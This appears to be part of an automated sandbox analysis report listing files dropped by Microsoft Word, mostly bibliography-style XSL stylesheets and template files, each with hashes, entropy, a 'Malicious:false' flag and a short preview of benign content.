                                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):333258
                                                                                                                                              Entropy (8bit):4.654450340871081
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                              MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                              SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                              SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                              SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):296658
                                                                                                                                              Entropy (8bit):5.000002997029767
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                              MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                              SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                              SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                              SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):268317
                                                                                                                                              Entropy (8bit):5.05419861997223
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                              MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                              SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                              SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                              SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):255948
                                                                                                                                              Entropy (8bit):5.103631650117028
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                              MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                              SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                              SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                              SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):251032
                                                                                                                                              Entropy (8bit):5.102652100491927
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                              MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                              SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                              SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                              SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):284415
                                                                                                                                              Entropy (8bit):5.00549404077789
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                              MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                              SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                              SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                              SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):294178
                                                                                                                                              Entropy (8bit):4.977758311135714
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                              MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                              SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                              SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                              SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):270198
                                                                                                                                              Entropy (8bit):5.073814698282113
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                              MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                              SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                              SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                              SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):217137
                                                                                                                                              Entropy (8bit):5.068335381017074
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                              MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                              SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                              SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                              SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):254875
                                                                                                                                              Entropy (8bit):5.003842588822783
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                              MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                              SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                              SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                              SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):344303
                                                                                                                                              Entropy (8bit):5.023195898304535
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                              MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                              SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                              SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                              SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):250983
                                                                                                                                              Entropy (8bit):5.057714239438731
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                              MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                              SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                              SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                              SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):51826
                                                                                                                                              Entropy (8bit):5.541375256745271
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                              MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                              SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                              SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                              SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                              File Type:Microsoft Word 2007+
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):47296
                                                                                                                                              Entropy (8bit):6.42327948041841
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
